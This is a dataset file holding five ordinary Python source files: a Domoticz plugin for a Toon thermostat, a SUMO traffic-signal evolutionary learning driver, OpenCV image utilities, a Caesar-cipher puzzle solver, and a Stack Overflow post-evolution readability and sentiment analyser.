+{"seq_id":"398156889","text":"# ToonApiLib for Domoticz\n# https://github.com/JohnvandeVrugt/toonapilib4domoticz\n# by John van de Vrugt\n#\n# A domoticz plugin based on the toonapilib by Costas Tyfoxylos\n# https://github.com/costastf/toonapilib/\n\"\"\"\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\"\"\"\nimport Domoticz\nimport toonapilib\n\nUNIT_POWER = 1\nUNIT_GAS = 2\nUNIT_TEMPERATURE = 3\nUNIT_SET_POINT = 4\nUNIT_HEATING_ACTIVE = 5\nUNIT_HOT_WATER_ACTIVE = 6\nUNIT_PREHEAT_ACTIVE = 7\nUNIT_SCENE = 8\nUNIT_PROGRAM_STATE = 9\nUNIT_MODULATION_LEVEL = 10\n\nHEARTBEATS_PER_MIN = 6\n\n\nclass ToonApiLibPlugin:\n my_toon = None\n heart_beat = 0\n print_debug_log = True\n heart_bead_mod = 1\n\n prv_str_power = \"\"\n prv_str_gas = \"\"\n prv_str_temp = \"\"\n prv_str_set_point = \"\"\n prv_str_burner_state = \"\"\n prv_str_thermostat_state = \"\"\n prv_program_state = -1\n prv_modulation_level = -1\n\n def __init__(self):\n return\n\n def on_start(self):\n Domoticz.Log(\"Using toonapilib version \" + toonapilib.__version__ + \" by \" + toonapilib.__author__)\n\n self.print_debug_log = Parameters[\"Mode6\"] == \"Debug\"\n if self.print_debug_log:\n Domoticz.Log(\"Debug logging is active\")\n\n updates_per_min = 1\n if Parameters[\"Mode3\"] != \"\":\n updates_per_min = int(Parameters[\"Mode3\"])\n self.heart_bead_mod = HEARTBEATS_PER_MIN * updates_per_min\n\n if self.my_toon is None:\n self._create_toon_object()\n\n self._check_and_create_devices()\n self._update_devices()\n\n def on_command(self, Unit, Command, Level, Hue):\n if self.print_debug_log:\n Domoticz.Log(\"onCommand called for Unit \" + str(Unit) + \": Parameter '\" +\n str(Command) + \"', Level: \" + str(Level))\n\n try:\n if Unit == UNIT_SET_POINT:\n self.my_toon.thermostat = Level\n Domoticz.Log(\"set set point \" + str(Level))\n Devices[UNIT_SET_POINT].Update(0, str(Level))\n except:\n Domoticz.Log(\"An error occurred setting thermostat\")\n\n try:\n if Unit == UNIT_SCENE:\n str_scene = self.get_scene_name(Level)\n self.my_toon.thermostat_state = str_scene\n Domoticz.Log(\"set scene \" + str(Level) + \" - \" + str_scene)\n Devices[UNIT_SCENE].Update(2, str(Level))\n except:\n Domoticz.Log(\"An error occurred setting scene\")\n\n try:\n if Unit == UNIT_PROGRAM_STATE:\n str_program_state = str(Command).lower()\n self.my_toon.program_state = str_program_state\n program_state = 0\n if str_program_state != \"off\":\n program_state = 1\n Domoticz.Log(\"set program state \" + str_program_state + \" - \" + str(program_state))\n Devices[UNIT_PROGRAM_STATE].Update(program_state, str(program_state))\n except:\n Domoticz.Log(\"An error occurred setting program state\")\n\n def on_heartbeat(self):\n self.heart_beat = self.heart_beat + 1\n if self.my_toon is not None and self.heart_beat == self.heart_bead_mod:\n self.heart_beat = 0\n self._update_devices()\n\n def _create_toon_object(self):\n try:\n myname = Parameters[\"Username\"]\n mypass = Parameters[\"Password\"]\n mykey = Parameters[\"Mode1\"]\n mysecret = Parameters[\"Mode2\"]\n\n if self.print_debug_log:\n Domoticz.Log(\"Creating toonapilib object\")\n\n self.my_toon = toonapilib.Toon(myname, mypass, mykey, mysecret)\n except Exception:\n self.my_toon = None\n Domoticz.Log(\"Could not create a toonapilib object\")\n Domoticz.Log(\"Possible solution:\")\n Domoticz.Log(\"* Check your credentials\")\n Domoticz.Log(\"* Restart Domoticz\")\n\n def _check_and_create_devices(self):\n Domoticz.Log(\"Check and create Toon devices\")\n\n if UNIT_POWER not in Devices:\n try:\n Domoticz.Log(\"Creating Power usage device\")\n Domoticz.Device(Name=\"Power usage\",\n Unit=UNIT_POWER,\n Type=250,\n Subtype=1).Create()\n except:\n Domoticz.Log(\"An error occurred creating Power usage device\")\n\n if UNIT_GAS not in Devices:\n try:\n Domoticz.Log(\"Creating Gas usage device\")\n Domoticz.Device(Name=\"Gas usage\",\n Unit=UNIT_GAS,\n Type=251,\n Subtype=2).Create()\n except:\n Domoticz.Log(\"An error occurred creating Gas usage device\")\n\n if UNIT_TEMPERATURE not in Devices:\n try:\n Domoticz.Log(\"Creating Room temperature device\")\n Domoticz.Device(Name=\"Room temperature\",\n Unit=UNIT_TEMPERATURE,\n Type=80,\n Subtype=5).Create()\n except:\n Domoticz.Log(\"An error occurred creating Room temperature device\")\n\n if UNIT_SET_POINT not in Devices:\n try:\n Domoticz.Log(\"Creating Set point device\")\n Domoticz.Device(Name=\"Set point\",\n Unit=UNIT_SET_POINT,\n Type=242,\n Subtype=1).Create()\n except:\n Domoticz.Log(\"An error occurred creating Set point device\")\n\n if UNIT_HEATING_ACTIVE not in Devices:\n try:\n Domoticz.Log(\"Creating Heating active device\")\n Domoticz.Device(Name=\"Heating active\",\n Unit=UNIT_HEATING_ACTIVE,\n Type=244,\n Subtype=62,\n Switchtype=0,\n Image=9).Create()\n except:\n Domoticz.Log(\"An error occurred creating Heating active device\")\n\n if UNIT_HOT_WATER_ACTIVE not in Devices:\n try:\n Domoticz.Log(\"Creating Hot water active device\")\n Domoticz.Device(Name=\"Hot water active\",\n Unit=UNIT_HOT_WATER_ACTIVE,\n Type=244,\n Subtype=62,\n Switchtype=0,\n Image=9).Create()\n except:\n Domoticz.Log(\"An error occurred creating Hot water active device\")\n\n if UNIT_PREHEAT_ACTIVE not in Devices:\n try:\n Domoticz.Log(\"Creating Preheat active device\")\n Domoticz.Device(Name=\"Preheat active\",\n Unit=UNIT_PREHEAT_ACTIVE,\n Type=244,\n Subtype=62,\n Switchtype=0,\n Image=9).Create()\n except:\n Domoticz.Log(\"An error occurred creating Preheat active device\")\n\n if UNIT_SCENE not in Devices:\n try:\n Domoticz.Log(\"Creating Scene device\")\n options = {\n \"LevelNames\": \"Unknown|Away|Sleep|Home|Comfort|Holiday\",\n \"LevelOffHidden\": \"true\", \"SelectorStyle\": \"0\"}\n Domoticz.Device(Name=\"Scene\",\n Unit=UNIT_SCENE,\n TypeName=\"Selector Switch\",\n Options=options).Create()\n except:\n Domoticz.Log(\"An error occurred creating Scene device\")\n\n if UNIT_PROGRAM_STATE not in Devices:\n try:\n Domoticz.Log(\"Creating Program state device\")\n Domoticz.Device(Name=\"Program state\",\n Unit=UNIT_PROGRAM_STATE,\n Type=244,\n Subtype=62,\n Switchtype=0,\n Image=9).Create()\n except:\n Domoticz.Log(\"An error occurred creating Program state device\")\n\n if UNIT_MODULATION_LEVEL not in Devices:\n try:\n Domoticz.Log(\"Creating Modulation level device\")\n Domoticz.Device(Name=\"Modulation level\",\n Unit=UNIT_MODULATION_LEVEL,\n Type=243,\n Subtype=6,\n Switchtype=0).Create()\n except:\n Domoticz.Log(\"An error occurred creating Modulation level device\")\n\n def _update_devices(self):\n if self.my_toon is not None:\n self._update_power()\n self._update_gas()\n self._update_temperature()\n self._update_set_point()\n self._update_burner_state()\n self._update_thermostat_state()\n self._update_program_active()\n self._update_modulation_level()\n\n def _update_power(self):\n try:\n str_power = str(self.my_toon.power.meter_reading_low) + \";\" + \\\n str(self.my_toon.power.meter_reading) + \";\" + \\\n str(self.my_toon.solar.meter_reading_low_produced) + \";\" + \\\n str(self.my_toon.solar.meter_reading_produced) + \";\" + \\\n str(self.my_toon.power.value) + \";\" + str(self.my_toon.solar.value)\n\n if str_power != self.prv_str_power:\n if self.print_debug_log:\n Domoticz.Log(\"Update power/solar usage: \" + str_power)\n Devices[UNIT_POWER].Update(0, str_power)\n\n self.prv_str_power = str_power\n except:\n Domoticz.Log(\"An error occurred updating power usage\")\n\n def _update_gas(self):\n try:\n str_gas = str(self.my_toon.gas.daily_usage)\n\n if str_gas != self.prv_str_gas:\n if self.print_debug_log:\n Domoticz.Log(\"Update gas usage: \" + str_gas)\n Devices[UNIT_GAS].Update(0, str_gas)\n\n self.prv_str_gas = str_gas\n except:\n Domoticz.Log(\"An error occurred updating gas usage\")\n\n def _update_temperature(self):\n try:\n str_temp = str(self.my_toon.temperature)\n\n if str_temp != self.prv_str_temp:\n if self.print_debug_log:\n Domoticz.Log(\"Update temperature: \" + str_temp)\n Devices[UNIT_TEMPERATURE].Update(0, str_temp)\n\n self.prv_str_temp = str_temp\n except:\n Domoticz.Log(\"An error occurred updating temperature\")\n\n def _update_set_point(self):\n try:\n str_set_point = str(self.my_toon.thermostat)\n\n if str_set_point != self.prv_str_set_point:\n if self.print_debug_log:\n Domoticz.Log(\"Update set point: \" + str_set_point)\n Devices[UNIT_SET_POINT].Update(0, str_set_point)\n\n self.prv_str_set_point = str_set_point\n except:\n Domoticz.Log(\"An error occurred updating thermostat set point\")\n\n def _update_burner_state(self):\n try:\n str_burner_state = \"\"\n\n try:\n str_burner_state = self.my_toon.burner_state\n except:\n Domoticz.Log(\"An error occurred updating burner state\")\n\n if str_burner_state != \"\":\n \n if str_burner_state != self.prv_str_burner_state:\n \n if self.print_debug_log:\n Domoticz.Log(\"Update burner state: \" + str_burner_state)\n\n if str_burner_state == \"on\":\n Devices[UNIT_HEATING_ACTIVE].Update(1, str(1))\n elif str_burner_state == \"water_heating\":\n Devices[UNIT_HOT_WATER_ACTIVE].Update(1, str(1))\n elif str_burner_state == \"pre_heating\":\n Devices[UNIT_PREHEAT_ACTIVE].Update(1, str(1))\n \n if self.prv_str_burner_state == \"on\":\n Devices[UNIT_HEATING_ACTIVE].Update(0, str(0))\n elif self.prv_str_burner_state == \"water_heating\":\n Devices[UNIT_HOT_WATER_ACTIVE].Update(0, str(0))\n elif self.prv_str_burner_state == \"pre_heating\":\n Devices[UNIT_PREHEAT_ACTIVE].Update(0, str(0))\n \n self.prv_str_burner_state = str_burner_state\n except:\n Domoticz.Log(\"An error occurred updating burner state\")\n\n def _update_thermostat_state(self):\n try:\n str_thermostat_state = \"\"\n if not self.my_toon.thermostat_state:\n str_thermostat_state = \"Unknown\"\n if self.print_debug_log:\n Domoticz.Log(\"Update state: Manual set point - no thermostat state chosen\")\n else:\n str_thermostat_state = str(self.my_toon.thermostat_state.name)\n\n if str_thermostat_state != \"\":\n if str_thermostat_state != self.prv_str_thermostat_state:\n if self.print_debug_log:\n Domoticz.Log(\"Update state: \" + str_thermostat_state + \" - \" +\n str(self.get_scene_value(str_thermostat_state)))\n Devices[UNIT_SCENE].Update(2, str(self.get_scene_value(str_thermostat_state)))\n\n self.prv_str_thermostat_state = str_thermostat_state\n except:\n Domoticz.Log(\"An error occurred updating thermostat state\")\n\n def _update_program_active(self):\n try:\n program_state = 0\n if self.my_toon.program_state != \"off\":\n program_state = 1\n\n if program_state != self.prv_program_state:\n if self.print_debug_log:\n Domoticz.Log(\"Update program state: \" + str(program_state))\n Devices[UNIT_PROGRAM_STATE].Update(program_state, str(program_state))\n\n self.prv_program_state = program_state\n except:\n Domoticz.Log(\"An error occurred updating program state\")\n\n def _update_modulation_level(self):\n try:\n modulation_level = self.my_toon.thermostat_info.current_modulation_level\n\n if modulation_level != self.prv_modulation_level:\n if self.print_debug_log:\n Domoticz.Log(\"Update modulation level: \" + str(modulation_level))\n Devices[UNIT_MODULATION_LEVEL].Update(modulation_level, str(modulation_level))\n\n self.prv_modulation_level = modulation_level\n except:\n Domoticz.Log(\"An error occurred updating modulation level\")\n\n @staticmethod\n def get_scene_value(x):\n return {\n 'Unknown': 0,\n 'Away': 10,\n 'Sleep': 20,\n 'Home': 30,\n 'Comfort': 40,\n 'Holiday': 50\n }[x]\n\n @staticmethod\n def get_scene_name(i):\n str_return_string = \"Unknown\"\n\n if i == 10:\n str_return_string = \"Away\"\n elif i == 20:\n str_return_string = \"Sleep\"\n elif i == 30:\n str_return_string = \"Home\"\n elif i == 40:\n str_return_string = \"Comfort\"\n elif i == 50:\n str_return_string = \"Holiday\"\n\n return str_return_string\n\nglobal _plugin\n_plugin = ToonApiLibPlugin()\n\n\ndef onStart():\n global _plugin\n _plugin.on_start()\n\n\ndef onCommand(Unit, Command, Level, Hue):\n global _plugin\n _plugin.on_command(Unit, Command, Level, Hue)\n\n\ndef onHeartbeat():\n global _plugin\n _plugin.on_heartbeat()\n","sub_path":"plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":17216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"76045761","text":"import os\r\nimport sys\r\nimport InitSetUp \r\nimport OutputManager\r\n\r\nimport datetime\r\nimport timeit\r\nimport time\r\n\r\nfrom Driver import Driver\r\nimport EvolutionaryLearner\r\n\r\n\r\n# Importing needed python modules from the $SUMO_HOME/tools directory\r\nif 'SUMO_HOME' in os.environ:\r\n tools = os.path.join(os.environ['SUMO_HOME'], 'share/sumo/tools')\r\n sys.path.append(tools)\r\nelse:\r\n sys.exit(\"please declare environment variable 'SUMO_HOME'\")\r\n\r\n\r\nfrom sumolib import checkBinary # Checks for the binary in environ vars\r\nimport traci\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # --- TRAINING OPTIONS ---\r\n gui = False\r\n totalGenerations = 50\r\n individualRunsPerGen = 3 # Min number of training runs an individual gets per generation\r\n # ----------------------\r\n \r\n # --- USER-DEFINED RULES TOGGLE ---\r\n maxGreenAndYellowPhaseTime_UDRule = True\r\n maxRedPhaseTime_UDRule = False\r\n assignGreenPhaseToSingleWaitingPhase_UDRule = True\r\n # ----------------------\r\n\r\n # Attributes of the simulation\r\n sumoNetworkName = \"simpleNetwork.net.xml\"\r\n maxGreenPhaseTime = 225\r\n maxYellowPhaseTime = 5\r\n maxSimulationTime = 10000\r\n runTimeSet = []\r\n\r\n\r\n # setting the cmd mode or the visual mode\r\n if gui == False:\r\n sumoBinary = checkBinary('sumo')\r\n else:\r\n sumoBinary = checkBinary('sumo-gui')\r\n\r\n # initializations\r\n #sumoCmd = [sumoBinary, \"-c\", \"intersection/tlcs_config_train.sumocfg\", \"--no-step-log\", \"true\", \"--waiting-time-memory\", str(max_steps)]\r\n sumoCmd = [sumoBinary, \"-c\", \"config_file.sumocfg\", \"--waiting-time-memory\", \"5\", \"--time-to-teleport\", \"-1\"]\r\n \r\n print(\"----- Start time:\", datetime.datetime.now())\r\n setUpTuple = InitSetUp.run(sumoNetworkName, individualRunsPerGen)\r\n simRunner = Driver(sumoCmd, setUpTuple, maxGreenPhaseTime, maxYellowPhaseTime, maxSimulationTime, maxGreenAndYellowPhaseTime_UDRule, maxRedPhaseTime_UDRule, assignGreenPhaseToSingleWaitingPhase_UDRule)\r\n episode = 0\r\n generations = 1\r\n allIndividualsTested = False\r\n simulationStartTime = datetime.datetime.now()\r\n generationRuntimes = []\r\n\r\n # Evolutionary learning loop \r\n while generations <= totalGenerations:\r\n print('----- GENERATION {} of {}'.format(generations, totalGenerations))\r\n print(\"This simulation began at:\", simulationStartTime)\r\n print(\"The average generation runtime is\", sum(generationRuntimes)/generations)\r\n genStart = datetime.datetime.now()\r\n startTime = time.time()\r\n\r\n # Prepare for next simulation run\r\n allIndividualsTested = False\r\n for ap in setUpTuple[2]:\r\n for i in ap.getIndividualsSet():\r\n i.resetSelectedCount()\r\n # print(\"Generation includes Individual:\", i.getID())\r\n\r\n # Reinforcement learning loop\r\n while not allIndividualsTested:\r\n # Adjust maximum simulation times for individuals based on generation count\r\n if generations >= 5 and generations < 15:\r\n print('The generation is', generations, \"so we're changing maxSimTime to 6000\")\r\n maxSimulationTime = 6000\r\n print(\"Changed maxSimTime to\", maxSimulationTime)\r\n elif generations >= 15:\r\n print('The generation is', generations, \"so we're changing maxSimTime to 4000\")\r\n maxSimulationTime = 4000\r\n print(\"Changed maxSimTime to\", maxSimulationTime)\r\n\r\n print('Changes made. The generation is', generations, \"and the maxSimTime is\", maxSimulationTime)\r\n simRunner = Driver(sumoCmd, setUpTuple, maxGreenPhaseTime, maxYellowPhaseTime, maxSimulationTime, maxGreenAndYellowPhaseTime_UDRule, maxRedPhaseTime_UDRule, assignGreenPhaseToSingleWaitingPhase_UDRule)\r\n\r\n print('----- Episode {}'.format(episode+1), \"of GENERATION {} of {}\".format(generations, totalGenerations))\r\n print(\"Generation start time:\", genStart)\r\n print(\"The average generation runtime is\", sum(generationRuntimes)/generations)\r\n start = timeit.default_timer()\r\n resultingAgentPools = simRunner.run() # run the simulation\r\n stop = timeit.default_timer()\r\n print('Time: ', round(stop - start, 1))\r\n episode += 1\r\n\r\n needsTesting = []\r\n for ap in resultingAgentPools:\r\n for i in ap.getIndividualsSet():\r\n if i.getSelectedCount() < individualRunsPerGen:\r\n needsTesting.append(True)\r\n else:\r\n needsTesting.append(False)\r\n \r\n if True not in needsTesting:\r\n allIndividualsTested = True\r\n for ap in resultingAgentPools:\r\n for i in ap.getIndividualsSet():\r\n continue # print(i, \"has a selected count of:\", i.getSelectedCount())\r\n #allIndividualsTested = True # Uncomment for quick testing\r\n\r\n # Prepare individuals for the next run through\r\n for ap in setUpTuple[2]:\r\n ap.normalizeIndividualsFitnesses() # Normalize the fitness values of each Individual in an agent pool for breeding purposes\r\n \r\n if generations + 1 < totalGenerations:\r\n EvolutionaryLearner.createNewGeneration(setUpTuple[2]) # Update agent pools with a new generation of individuals\r\n for ap in setUpTuple[2]:\r\n for i in ap.getIndividualsSet():\r\n i.resetSelectedCount()\r\n i.resetAggregateVehicleWaitTime()\r\n # print(\"Generation includes Individual:\", i.getID(), \";\\n\")\r\n sys.stdout.flush()\r\n else:\r\n OutputManager.run(setUpTuple[2], sum(generationRuntimes)/50, (sum(generationRuntimes)/50)*50)\r\n print(\"Output file created.\")\r\n \r\n # bestIndividuals = []\r\n # for ap in setUpTuple[2]:\r\n # bestIndividuals.append(ap.getBestIndividual())\r\n \r\n # f = open(\"bestIndividuals.txt\", \"w\")\r\n \r\n # for i in bestIndividuals:\r\n # f.write(\"The best individual in Agent Pool\", i.getAgentPool().getID(), \"is\", i.getID(), \"comprised of conditions:\", i.getConditions(), \"and action:\", i.getAction(), \"\\n\\n\")\r\n \r\n print(\"Generation start time:\", genStart, \"----- End time:\", datetime.datetime.now())\r\n generationRuntimes.append(time.time() - startTime)\r\n generations += 1 \r\n \r\n\r\n print(\"Start time:\", simulationStartTime, \"----- End time:\", datetime.datetime.now())\r\n print(\"This simulation began at:\", simulationStartTime)\r\n print(\"PATH:\", path)\r\n # Do something to save session stats here\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"238708782","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n__all__ = ['display', 'plot', 'read_img', 'load', 'read', 'write_img', 'save', 'write',\n 'get_width_and_height', 'dimensions', 'get_height', 'height',\n 'get_width', 'width', 'bgr_2_grayscale', 'to_uint8', 'stack_3',\n 'get_depth', 'grayscale_2_bgr', 'Displayer', 'mean']\n\n\nclass Displayer:\n def __init__(self, window_name):\n self.window_name = window_name\n cv2.namedWindow(self.window_name, cv2.WINDOW_KEEPRATIO)\n cv2.resizeWindow(self.window_name, 1280, 720)\n\n def update_im(self, im):\n cv2.imshow(self.window_name, im)\n if cv2.waitKey(100) & 0xFF == ord('q'):\n pass\n\n\ndef mean(ims):\n im = np.stack(ims, axis=len(np.shape(ims[0])))\n im = np.float32(im)\n im = np.mean(im, axis=len(np.shape(ims[0])))\n return np.uint8(im)\n\ndef display(image, title=''):\n \"\"\"Uses cv2 to display an image then wait for a button press\"\"\"\n\n cv2.namedWindow(title, cv2.WINDOW_KEEPRATIO)\n cv2.resizeWindow(title, 960, 540)\n cv2.imshow(title, image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\ndef plot(im):\n plt.figure()\n plt.imshow(im)\n plt.show()\n\ndef to_uint8(im):\n im = (im - np.min(im))/(np.max(im)-np.min(im)) * 255\n return np.uint8(im)\n\ndef read_img(filepath, flag=1):\n \"\"\"\n Reads an image from a filepath.\n\n The image should be in the working directory or a full path of image\n should be given.\n\n Parameters\n ----------\n filepath: filepath of the image\n\n flag: Specifies how the image is read\n 1: Loads a color image. Any transparency will be neglected.\n 0: Loads image in grayscale mode.\n -1: Loads image including alpha channel\n\n Returns\n -------\n img: output image\n Number of channels will be determined by the chosen flag.\n Equal to None if filepath does not exist\n Color images will have channels stored in BGR order\n\n \"\"\"\n img = cv2.imread(filepath, flag)\n return img\n\n\nload = read_img\nread = read_img\n\n\ndef write_img(img, filename):\n \"\"\"\n Saves an image to a specified file.\n\n The image format is chosen based on the filename extension\n\n Parameters\n ----------\n img: Image to be saved\n\n filename: Name of the file\n\n Notes\n -----\n Only 8-bit single channel or 3-channel (BGR order) can be saved. If\n the format, depth or channel order is different convert it first.\n\n It is possible to store PNG images with an alpha channel using this\n function. To do this, create 8-bit 4-channel image BGRA, where the alpha\n channel goes last. Fully transparent pixels should have alpha set to 0,\n fully opaque pixels should have alpha set to 255\n\n \"\"\"\n cv2.imwrite(filename, img)\n\n\nsave = write_img\nwrite = write_img\n\n\ndef get_width_and_height(img):\n \"\"\"\n Returns width, height for an image\n\n Parameters\n ----------\n img: Array containing an image\n\n Returns\n -------\n width: int\n Width of the image\n height: int\n Height of the image\n\n Notes\n -----\n Width of an image is the first dimension for numpy arrays.\n Height of an image is the first dimension for openCV\n \"\"\"\n width = get_width(img)\n height = get_height(img)\n return width, height\n\n\ndimensions = get_width_and_height\n\n\ndef get_width(img):\n \"\"\"\n Returns width for img\n\n Parameters\n ----------\n img: Array containing an image\n\n Returns\n -------\n width: int\n Width of the image\n\n \"\"\"\n return int(np.shape(img)[1])\n\n\nwidth = get_width\n\n\ndef get_height(img):\n \"\"\"\n Returns the height of an image\n\n Parameters\n ----------\n img: Array containing an image\n\n Returns\n -------\n height: int\n height of the image\n\n \"\"\"\n return int(np.shape(img)[0])\n\n\nheight = get_height\n\n\ndef bgr_2_grayscale(img):\n \"\"\"Converts a BGR image to grayscale\"\"\"\n sz = np.shape(img)\n if np.shape(sz)[0] == 3:\n return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n if np.shape(sz)[0] == 2:\n print('Image is already grayscale')\n return img\n\n\ndef stack_3(img):\n \"\"\"Stacks a grayscale image to 3 depths so that coloured objects\n can be drawn on top\"\"\"\n im = np.dstack((img, img, img))\n return im\n\n\ndef grayscale_2_bgr(img):\n if len(np.shape(img)) == 3:\n print('Image is already 3 channels')\n return img\n else:\n return cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n\n\ndef get_depth(img):\n shp = np.shape(img)\n if len(shp) == 2:\n return 1\n else:\n return shp[2]\n","sub_path":"images/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"445721859","text":"alphabet = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\"]\n\ntobesolved = \"\"\"g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc\ndmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle.\nsqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj.\"\"\"\n\nans = \"\"\n\nfor i in range (0, len(tobesolved)):\n x = tobesolved[i]\n #could use .isalpha() returns True or False\n if x != \" \" and x != \".\" and x != \"(\" and x != \")\" and x != \"'\" and x != \"\\n\":\n y = alphabet.index(x)\n if y+2 > 25:\n y = y - 26\n ans = ans + alphabet[y+2]\n else:\n ans = ans + x\n i += 1\nprint(ans)\n","sub_path":"Old Python/Python_Challenge/pc1.py","file_name":"pc1.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"643048432","text":"from sodatamining.DBConnection import DBConnection\n\n\nclass PostEvolution:\n \n def __init__(self):\n self.debug = False\n self.dbc = DBConnection()\n \n # creates the two tables that hold the differences from one version to another\n #self.dbc.create_evolution_tables()\n \n # calculates and writes the evolutionary steps of the \n # post blocks into postblockevolution \n #self.postblock_evolution()\n \n # calculates and writes the evolutionary steps of \n # post history into posthistoryevolution \n #self.posthistory_evolution()\n \n def postblock_evolution(self):\n counter = 0\n # gets the id's of all entries of the table\n post_block_ids = self.dbc.get_ids_from_postblockversion()\n \n for id_ in post_block_ids:\n # block contains: posthistoryid, postblockid, predpostblockid, \n # flesch_reading_ease, gunning fog index, neg, neu, pos, compound \n block = self.dbc.get_postblock_value(id_[0])\n predBlock = self.dbc.get_postblock_value(block[2])\n \n if predBlock != None:\n self.evaluate_evolution('postblockevolution', block, predBlock)\n #else: \n #print str(id_) + ' has no predecessor!'\n \n counter += 1\n if ((counter % 10000) == 0):\n print (str(counter) + \" post blocks processed!\")\n \n def posthistory_evolution(self):\n counter = 0\n post_history_ids = self.dbc.get_posthistoryid_from_texttype()\n \n for id_ in post_history_ids: \n # post contains: placeholder, posthistoryid, predposthistoryid, \n # flesch_reading_ease, gunning fog index, neg, neu, pos, compound \n post = self.dbc.get_posthistory_value(id_[0])\n # predPost contains: placeholder, placeholder2, posthistoryid,\n # flesch_reading_ease, gunning fog index, neg, neu, pos, compound \n predPost = self.dbc.get_predposthistory_value(post[2]) \n \n if predPost != None: \n self.evaluate_evolution('posthistoryevolution', post, predPost)\n #else: \n #print str(id_) + ' has no predecessor!'\n \n counter += 1\n if ((counter % 10000) == 0):\n print (str(counter) + \" history posts processed!\")\n \n def evaluate_evolution(self, table, entry, predEntry):\n change_type = ''\n debugString = ''\n \n \"\"\"Flesch-Reading-Ease comparison\"\"\"\n if entry[3] > predEntry[3]:\n # Higher score means easier to read\n change_type = 'readability_flesch_improved'\n elif entry[3] < predEntry[3]:\n change_type = 'readability_flesch_aggravate'\n else:\n change_type = 'readability_flesch_unchanged'\n \n if not self.debug:\n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[3], predEntry[3])\n else: \n debugString += change_type + \"-\"\n \n \"\"\"Gunning_Fox index\"\"\"\n if entry[4] < predEntry[4]:\n # Lower score means easier to read\n change_type = 'readability_fog_improved'\n elif entry[4] > predEntry[4]: \n change_type = 'readability_fog_aggravate'\n else: \n change_type = 'readability_fog_unchanged'\n \n if not self.debug: \n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[4], predEntry[4])\n else: \n debugString += change_type + \"-\"\n \n \"\"\"\n \\\"\"\"Sentiment negative value\\\"\"\"\n if entry[5] < predEntry[5]:\n change_type = 'sentiment_neg_decreased'\n else: \n change_type = 'sentiment_neg_increased'\n \n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[5], predEntry[5])\n \n \\\"\"\"Sentiment neutral value\\\"\"\"\n if entry[6] < predEntry[6]:\n change_type = 'sentiment_neu_decreased'\n else: \n change_type = 'sentiment_neu_increased'\n \n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[6], predEntry[6])\n \n \\\"\"\"Sentiment positive value\\\"\"\"\n if entry[7] < predEntry[7]:\n change_type = 'sentiment_pos_decreased'\n else: \n change_type = 'sentiment_pos_increased'\n \n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[7], predEntry[7])\n \"\"\"\n \n \"\"\"Sentiment compound value\"\"\"\n if entry[8] > predEntry[8]:\n change_type = 'sentiment_com_improved'\n elif entry[8] < predEntry[8]: \n change_type = 'sentiment_com_aggravate'\n else: \n change_type = 'sentiment_com_unchanged'\n \n if not self.debug: \n self.insert_evolution_entry(table, entry, predEntry, change_type, entry[8], predEntry[8])\n else: \n debugString += change_type\n return debugString\n \n def insert_evolution_entry(self, table, entry, predEntry, change_type, vnew, vold):\n \n if table == 'postblockevolution':\n values = {\n 'posthistoryid': entry[0],\n 'changetype': change_type,\n 'postblockid': entry[1],\n 'predpostblockid': predEntry[1],\n 'valuenew': vnew,\n 'valueold': vold\n }\n \n if self.debug:\n return values;\n else:\n self.dbc.insert_postblockevolution_entry(values)\n \n elif table == 'posthistoryevolution': \n values = {\n 'changetype': change_type,\n 'posthistoryid': entry[1],\n 'predposthistoryid': predEntry[2],\n 'valuenew': vnew,\n 'valueold': vold\n }\n \n if self.debug:\n return values\n else:\n self.dbc.insert_posthistoryevolution_entry(values)\n \nif __name__ == \"__main__\":\n pE = PostEvolution()","sub_path":"sodatamining/PostEvolution.py","file_name":"PostEvolution.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
